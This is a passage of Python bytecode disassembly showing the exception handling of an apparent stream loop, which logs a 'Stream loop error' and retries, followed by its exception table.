 774            LOAD_GLOBAL             54 (Exception)
                CHECK_EXC_MATCH
                POP_JUMP_IF_FALSE       24 (to L37)
                STORE_FAST              10 (ex)

 775   L34:     LOAD_GLOBAL             57 (_log + NULL)
                LOAD_CONST              18 ('Stream loop error: ')
                LOAD_FAST               10 (ex)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                POP_TOP
       L35:     POP_EXCEPT
                LOAD_CONST               0 (None)
                STORE_FAST              10 (ex)
                DELETE_FAST             10 (ex)
                JUMP_BACKWARD_NO_INTERRUPT 69 (to L22)

  --   L36:     LOAD_CONST               0 (None)
                STORE_FAST              10 (ex)
                DELETE_FAST             10 (ex)
                RERAISE                  1

 774   L37:     RERAISE                  0

  --   L38:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 776   L39:     CLEANUP_THROW
       L40:     JUMP_BACKWARD_NO_INTERRUPT 51 (to L26)

 747   L41:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L42)
                RERAISE                  2
       L42:     POP_TOP
       L43:     POP_EXCEPT
                POP_TOP
                POP_TOP
                RETURN_CONST             0 (None)

  --   L44:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
       L45:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L45 [0] lasti
  L2 to L3 -> L41 [1] lasti
  L4 to L7 -> L33 [1]
  L7 to L8 -> L27 [3]
  L8 to L14 -> L33 [1]
  L14 to L15 -> L29 [3]
  L15 to L19 -> L33 [1]
  L19 to L20 -> L31 [3]
  L20 to L22 -> L33 [1]
  L22 to L24 -> L41 [1] lasti
  L24 to L25 -> L39 [3]
  L25 to L27 -> L41 [1] lasti
  L27 to L28 -> L33 [1]
  L29 to L30 -> L33 [1]
  L31 to L32 -> L33 [1]
  L33 to L34 -> L38 [2] lasti
  L34 to L35 -> L36 [2] lasti
  L35 to L36 -> L41 [1] lasti
  L36 to L38 -> L38 [2] lasti
  L38 to L40 -> L41 [1] lasti
  L41 to L43 -> L44 [3] lasti
  L43 to L45 -> L45 [0] lasti

